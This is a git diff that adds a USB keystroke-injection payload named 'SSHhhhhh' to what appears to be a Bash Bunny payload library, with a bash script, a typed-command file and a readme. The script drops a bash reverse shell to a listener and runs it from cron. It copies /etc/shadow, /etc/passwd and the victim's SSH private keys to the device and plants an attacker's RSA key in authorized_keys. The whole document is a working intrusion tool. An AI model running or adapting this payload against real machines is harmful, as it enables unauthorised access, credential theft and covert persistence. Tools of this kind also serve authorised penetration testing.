diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
new file mode 100644
index 00000000..11ecc635
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+
+# Main Payload
+
+# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
+REVERSESHELL=true
+LHOST='10.20.20.104' # Reverse Shell listening host IP
+LPORT='4444' # Reverse Shell listening host port
+CRON='30 */1 * * *' # Just the timing portion of the CRON job
+RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2'
+ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
+DT=$(date "+%Y.%m.%d-%H.%M.%S")
+DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
+
+if [ "$REVERSESHELL" = true ] ; then
+ # Create reverse shell script
+ echo "#!/bin/bash"> .config/rs.sh ;
+ echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
+ chmod +x /home/$USER/.config/rs.sh ;
+
+ # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
+ crontab -l > crontab.tmp ;
+ if grep -Fq .config/rs.sh crontab.tmp; then
+ echo 'Update in progress.'
+ else
+ echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
+ crontab crontab.tmp ;
+ fi
+ rm -f crontab.tmp ;
+fi
+
+# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
+mkdir $DN ;
+ip addr > $DN/ip-addr.txt ;
+whoami > $DN/whoami.txt ;
+cat /etc/passwd > $DN/etc-passwd.txt ;
+cat /etc/shadow > $DN/etc-shadow.txt ;
+uname -a > $DN/uname-a.txt ;
+route -n > $DN/route-n.txt ;
+cp /home/$USER/.ssh/* $DN/. ;
+
+# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
+if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
+ echo 'Update almost completed.'
+else
+ echo $RSA_KEY >> .ssh/authorized_keys ;
+fi
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
new file mode 100644
index 00000000..e7548d8e
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
@@ -0,0 +1,52 @@
+# Title: SSHhhhhh
+# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
+# Author: WWVB
+# Props: Hak5Darren
+# Version: 1.0
+# Category: Exfiltration w/Persistence
+# Target: Linux Ubuntu 18.04 LTS
+# Attackmodes: HID, Storage
+
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED STAGE1
+QUACK DELAY 500
+QUACK CTRL-ALT t
+QUACK DELAY 100
+
+# Drop primary payload on the box
+QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh .
+QUACK ENTER
+QUACK DELAY 50
+
+QUACK STRING chmod +x boom.sh
+QUACK ENTER
+QUACK DELAY 50
+
+LED ATTACK
+
+# Light the fuse and wait!!
+QUACK STRING ./boom.sh
+QUACK ENTER
+QUACK DELAY 1000
+
+# Cleanup
+LED CLEANUP
+QUACK STRING rm boom.sh
+QUACK ENTER
+QUACK DELAY 100
+
+# Bye Felicia!
+QUACK STRING umount '/media/$USER/BashBunny'
+QUACK ENTER
+QUACK DELAY 25
+
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 25
+
+LED FINISH
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
new file mode 100644
index 00000000..1eb09821
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
@@ -0,0 +1,24 @@
+# SSHhhhhh
+
+# Author: WWVB
+# Version: Version 1.0
+
+# Description
+
+# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
+ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major])
+
+# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
+ whoami
+ ip addr
+ route -n
+ /etc/passwd
+ /etc/shadow (on the off chance you get a root terminal)
+ uname -a
+
+ Two opportunites for persistence are injected:
+ Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
+ Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job
+ added that calls it on a schedule (aka Call Me Later)
+
+# Configuration = HID STORAGE